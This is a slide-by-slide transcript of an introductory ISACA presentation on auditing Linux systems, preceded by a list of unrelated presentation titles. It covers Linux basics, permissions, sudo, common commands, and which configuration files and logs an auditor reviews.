Leading Change strategies and insights for effective change management pdf 1.pdf
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Quantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsQuantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIs
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 

How to Audit Linux - Gene Kartavtsev, ISACA MN

  • 1. HOW TO AUDIT LINUX A Practical and Easy Primer ISACA Presentation – Minnesota Chapter Gene Kartavtsev - CISA, PCIP December 12, 2017
  • 2. AGENDA How do I audit Linux? About Linux What is Linux? Linux Architecture How does Linux do it? Linux Audit What is to audit in Linux?
  • 4. QUIZ: IS LINUX • …an Operating System (OS)? • …free? • … more secure? • …a penguin? • …worth it? • …a Unix?
  • 5. IS LINUX AN OPERATING SYSTEM?
  • 7. IS LINUX MORE SECURE?
  • 8. IS LINUX A PENGUIN?
  • 10. IS LINUX A UNIX?
  • 11. LINUX FACTS • Linux is not an OS, but it is the kernel, GNU Linux is the OS and it comes in over 300 flavors. • Linux Kernel was written by a 21 year finish college student as a part of his hobby • Linux is 26 years old • Linux is running on all 500 of the TOP500 supercomputers in the world. • Android Operating System is based off of Linux • Oscar-winning visual effects of the Titanic by James Cameron came from machines with Linux and Avatar was completely developed in 3D Applications on Linux platform. • Linux is everywhere…
  • 12. PLACES LINUX IS RUNNING USA • U.S. Department of Defense • U.S. Navy Submarine Fleet • U.S. Postal Service • U.S. Federal Courts • Traffic control of San Francisco • New York Stock Exchange • Amazon, Google, Wikipedia OTHER COUNTRIES • The City of Munich, Germany • French Parliament • State-Owned Industrial and Commercial Bank of China • Government of Mexico City • Czech Post • Russian, Switzerland Schools • German Universities
  • 13. LINUX STANDARD BASE The Linux Standard Base (LSB) is a joint project by several Linux distributions under the organizational structure of the Linux Foundation to standardize the software system structure, including the file system hierarchy used in the Linux operating system.
  • 14. LINUX PROS AND CONS PROS • Easy to install • It is free • It is stable • Intelligent architecture • Many distributions available • Security CONS • Not too “user friendly” • Does not have dedicated support • Might not support a hardware • Desktop applications might not be available • Learning curve is required
  • 16. RUNLEVELS A runlevel is one of the modes that a Unix -based operating system will run in. Each runlevel has a certain number of services stopped or started, giving the user control over the behavior of the machine. Conventionally, seven runlevels exist, numbered from zero to six. Runlevel Mode Action 0 Halt Shuts down system 1 – “safe mode” Single-User Mode Does not configure network interfaces, start daemons, or allow non-root logins 2 -”often no used” Multi-User Mode Does not configure network interfaces or start daemons. 3 – “server” Multi-User Mode with Networking Starts the system normally. 4-”often no used” Undefined Not used/User-definable 5 – “desktop” X11 As runlevel 3 + display manager(X) – Desktop environment 6- “reboot” Reboot Reboots the system Init (short for initialization) is the program on Unix and Unix-like systems that spawns all other processes. It runs as a daemon and typically has PID 1 Example: init 6 - will reboot the machine
  • 17. LINUX FILE SYSTEM Shareable Unshareable Static /usr /opt /etc /boot Variable /var/mail /var/spool/news /var/run /var/lock FHS - Filesystem Hierarchy Standard - defines the directory structure and directory contents in Linux distributions. It is maintained by the Linux Foundation. In the FHS, all files and directories appear under the root directory /
  • 18. LINUX FILE SYSTEM Directory Description Windows equivalent / File structure root C: bin System command binaries (executables) and shells (command prompt). Used to bring the system up C:Windowssystem32 boot Files necessary to boot the system ntldr, ntdetect.com, boot.ini dev Files that communicate with hardware (device drivers) C:WindowsSystem32Drivers etc Etc[etera] - Critical system configuration files ( *.ini , registry) C:WindowsSystem32Drivers, regedit home Home directories for users C:Users lib Essential shared libraries and kernel modules *.dll, *.ocx files mnt Mount point for mounting a file system temporarily. It can be used for remotely located file system D:CDROM, server Map Network Drive opt Optional application software packages C:WindowsProgam Files"Program Name (Ex. Fonts) root Home directory for special user root (system administrator) C:UsersAdministrator sbin Essential system binaries only for root (system administrator) .msc, Microsoft Management Console tmp Temporary files %TEMP% usr User binaries, including programs , games, etc. C:Program files var Variable data . Ex. Email, print jobs, logs, etc.. %AppData%, %SystemRoot%, C:Windows Logs, C:WindowsSystem32config (Event Viewer files)
  • 19. PERMISSIONS - rwx rwx rwx PERMISSION TYPES R-Read (4), W-Write (2), X-Execute (1) 0 – Nothing 1- x 2 – w 4 – r 3 – wx = 1+2 5 – rx = 4+1 6 – rw = 4+2 7 – rwx = 4+2+1 USERS & GROUPS [---] - Owner, [---] - Group, [---] - All users • owner - The Owner permissions apply only the owner of the file or directory, they will not impact the actions of other users. • group - The Group permissions apply only to the group that has been assigned to the file or directory, they will not effect the actions of other users. • all users - The All Users permissions apply to all other users on the system, this is the permission group that you want to watch the most. ls –lah lists folder content in long format. –l - long listing format, -a – all files, h - human-readable Example: ls –lah /home/user -rw------- 1 gene gene 2.4K Dec 10 22:03 .bash_history
  • 20. WHO HAS PERMISSIONS TO DO WHAT? Example: rw-r--r--
  • 21. ROOT AND SUDO ROOT (SU–SUPER[SWITCH] USER) • Has unlimited privileges • Has only one password • Can make a damage to the system without warning • Username is always known to bad guys • Has only super user role SUDO (SUPER USER DO) • Minimizes root privileges • Root password is not shared or used • Prompts for password for every major step • Easier “undo” as it logs every step • Easier admin role transfer • Authentication timeout su – switches to root account su user switches to a user account , -c command – will run a command as a user sudo command – prompts for user password and confirms a request to execute a command The sudo command makes it easier to practice the principle of least privilege
  • 22. LINUX COMMANDS Task Linux Windows Information about system uname - a winver Current date and time date date /t , time /t Clear screen clear cls Compare files diff fc Find a string in a file grep find View a file less more Display location in a file system pwd chdir List files in a directory Ls -la dir Find IP ifconfig ipconfig See System information lscpu systeminfo See file system usage df -aTh Disk Manager, net use See running processes ps –ef tasklist See command description whatis <command> help See environmental variables env set See what user is logged in whoami whoami See network protocols in use netstat netstat
  • 23. LINUX FUN • Killing Daemons • Avoiding Zombies • Fortune Telling • Finding Jokes • Saying “Thank you !”
  • 24. LINUX AUDIT What is to audit in Linux?
  • 25. LINUX – Know before the audit • Linux is not going out of business • Linux is an intelilgent Operating System • Linux follows standards • Linux administration is a culture • Linux audit can be easily automated
  • 26. LINUX AUDIT CHALLENGES TOP 5 SYSADMIN’S COMPLAINTS ABOUT AUDIT • You're vague: Please do your homework before making request • You make urgent, last-minute requests: Please let me know about your request in advance • You waste your sysadmin's time: Please let me know about everything you need at once • You abuse your rights: Running an application as root isn't a fix • You take your sysadmin for granted: Not getting the slightest recognition when everything works, but being excessively blamed when something fails
  • 27. LINUX AUDIT - “Secrets” • Develop a relationship with Linux admin before the audit • Establish credibility with Linux admin • Communicate the Audit process • Scope • Timeline • Deliverables • Be current • Don’t be afraid to be a geek
  • 28. LINUX AUDIT OBJECTIVES • Authorized User Access • Authorized Services, Daemons, Modules • Authorized Networking/Connections • Authorized File Access • Appropriate Logging • Appropriate Security Parameters • Authorized Applications
  • 29. LINUX AUDIT - What should we look at? /etc - Primary system configuration directory /home/$USER - User data and user configuration information /var/log - Security logs, application logs, etc.
  • 30. LINUX AUDIT - Basic system profiling Linux distribution name and version /etc/*-release Computer name /etc/hostname IP Address(es) /etc/hosts /var/lib/dhclient
  • 31. LINUX AUDIT - User accounts Basic user data /etc/passwd Group membership /etc/group Admin users /etc/sudoers /etc/passwd (UID 0 account has admin privileges)
  • 32. LINUX AUDIT - User login history User, time, login durations /var/log/wtmp (use last command) Other logs /var/log/auth.log /var/log/sudo.log Commands last, lastlog, w, who
  • 33. LINUX AUDIT – No place like $HOME User files /home/<user> /root Important user files $HOME/.* - (Hidden files/directories start with “.”) $HOME/.bash_history - commands history $HOME/.ssh – remote access information
  • 34. LINUX AUDIT – Daemons, services Start-up scripts /etc/inittab, /etc/init.d, /etc/rc.d /etc/init.conf, /etc/init Scheduled tasks /etc/cron* /var/spool/cron/* Commands ps –ef, ps aux
  • 35. RESOURCES TO LEARN LINUX GENERAL • LinuxCommand.org • The Linux System Administrator's Guide • GNU Operating System • More… 12 Resources to Learn Linux SECURITY AND AUDIT • SANS Pen Testing • LinuxSecurity.com • Linux-Audit.com • Linuxtopia.org
  • 37. ABOUT SPEAKER Gene Kartavtsev, CISA, PCIP Gene has 20 years of Information Technology experience, which includes IT audit, security, architecture, engineering and support. Prior to focusing on IT Governance, Risk and Compliance, Gene worked at several global financial services and Media companies, including Bloomberg L.P and Thomson Reuters, where he sharpened his skills in information systems engineering and architecture. He participated in thousands of complex IT implementations and was often involved in solving technology challenges vital to the success of the core business. In 2012 while working at JetBlue on a PCI controls implementation project, Gene discovered the interesting world of IT compliance. (Maybe insert something here about what you liked about IT compliance) Later, after moving from New York to Minnesota Gene followed his passion in IT Risk Management and Compliance and has held several roles that have required a combination of technical expertise and knowledge of the latest IT regulations. Gene has rounded out his practical knowledge with CISA, PCIP, and ISA certifications. Gene recently joined Express Scripts, where he enjoys working with the challenges of applying multiple IT regulatory standards to many areas of large company operations. Other interests include spending time with the family, traveling and bicycle randonneuring - a long- distance, unsupported, noncompetitive cycling within prescribed time limits. LinkedIn: https://www.linkedin.com/in/gkartavtsev Email: gkartavtsev@gmail.com